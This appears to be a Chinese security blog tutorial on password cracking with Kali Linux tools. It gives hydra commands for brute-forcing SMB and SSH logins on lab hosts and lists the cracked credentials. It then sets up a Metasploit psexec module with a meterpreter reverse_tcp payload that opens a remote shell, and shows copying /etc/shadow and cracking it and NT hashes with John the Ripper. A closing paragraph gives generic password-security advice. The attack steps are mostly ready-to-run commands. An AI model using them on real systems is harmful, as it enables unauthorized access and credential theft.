Web安全第 06 讲:密码爆破工具hydra(kali)

1.1、windows系统口令远程爆破(smb服务,445端口)

命令:hydra -l administrator -P pwd.dic smb://10.211.55.8 -vV -f -e nsr

解析:-l指定用户名,-L指定用户名字典,-p指定密码,-P指定密码字典,-vV显示爆破细节,-o将爆破结果保存到文件,-f只要找到正确密码就停止爆破,-t指定线程数量,默认16,-e(n、s、r)n:null,s:same、r:反向

创建用户名和口令文件:

vim user.dic

vim pwd.dic

 暴力破解成功,用户名qin,密码1221

使用永恒之蓝尝试连接:

命令:msfconsole

执行:use exploit/windows/smb/psexec_psh

执行命令:set payload windows/x64/meterpreter/reverse_tcp

执行命令,设置远程目标:set RHOSTS 10.211.55.8

执行命令,设置用户名:set SMBUSER qin

执行命令,设置密码:set SMBPASS 1221

执行命令,设置本机地址:set LHOST 10.211.55.12

执行命令,攻击:exploit

6.2、Linux系统口令远程爆破(ssh服务,22端口)

主要爆破ssh服务

命令:hydra -L user.dic -P pwd.dic sssh://10.211.55.6 -vV -f -t64 -ensr

暴力破解成功,用户名root,密码Aa123123.

6.3、windows系统本地爆破

6.3.1、从内存中读取windows密码

 

6.3.2、windows的hash值破解(kali)

命令:john win2k8.hash --format-NT --wordlist=/root/dic/winPass.dic

解释:win2k8.hash是存hash的文件,--worldlist可选参数,如果不写就会用默认字典爆破

6.4、Linux系统本地爆破

拷贝shadow文件:cp /etc/shadow ./shadow

命令:john shadow

解析:shadow是拷贝过来的密码文件

命令:john --show shadow

解析:查看破解后的文件

 

  • 8
    点赞
  • 80
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
爆破用户名密码是一种黑客攻击手段,常用的方法之一是利用常用字典txt文件来尝试猜解用户的用户名和密码。 常用字典txt文件是一个包含各种可能的用户名和密码组合的文本文件,黑客可以通过逐个尝试这些组合来猜解用户的登录凭证。这些常用字典通常包含了很多常见的、弱密码,如123456、password等。黑客会利用这些弱密码和常见用户名,来尝试登录用户账户。 然而,爆破用户名密码常用字典txt也不是十分有效的攻击方法,因为许多网站在设计登录系统时已经考虑到了这一点,采取了一些安全措施来防止爆破攻击。例如,网站会设置登录次数限制,当失败登录次数超过一定次数后将会锁定账户,要求用户进行验证。另外,一些网站还会要求用户设置复杂的密码,包含数字、字母和特殊字符,并且定期要求用户更改密码,这样可以增加黑客猜解密码的难度。此外,网络安全工作人员还会实时监控登录行为,一旦发现异常登录尝试,就会进行相应的安全处理。 为了保护个人账户的安全,在使用用户名和密码进行登录时,我们也需要采取一些措施来增强密码的强度和保护账户的安全性。我们应该选择复杂的密码,避免使用常见的字母和数字组合,同时定期更换密码,避免使用相同的密码在不同的网站上。另外,我们也可以启用多因素身份验证来增强账户的安全性,例如短信验证码、指纹识别等。 总的来说,爆破用户名密码常用字典txt是一种黑客攻击手段,但由于各种安全措施的存在,它并不是十分有效,我们也需要采取一些措施来增强密码的强度和保护个人账户的安全性。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值